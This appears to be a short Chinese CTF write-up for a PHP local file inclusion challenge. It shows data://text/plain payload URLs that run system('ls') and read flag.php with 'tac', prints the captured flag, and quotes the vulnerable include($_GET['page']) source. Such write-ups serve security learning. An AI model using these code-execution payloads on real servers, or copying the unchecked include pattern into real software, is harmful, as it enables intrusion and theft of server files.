开始访问页面
发现已经给出了php源码
下面我们查查他有哪些文件
http://xxx/?page=data://text/plain,<?php system("ls")?>
发现有三个文件
一眼就能够看出flag肯定是我们需要查看的文件
接着查看它
http://xxxx3:9998/?page=data://text/plain,<?php system("cat flag.php")?>
发现该页面没有什么变化
尝试将cat命令换成tac
发现flag出来了
$flag="key2:5Fvcs07N";
下面是源码
<?php
show_source(__FILE__);
echo $_GET[‘hello‘];
$page=$_GET[‘page‘];
//while (strstr($page, "php://")) {
// $page=str_replace("php://", "", $page);
//}
include($page);
?>
原文:https://www.cnblogs.com/liangshao666/p/14906427.html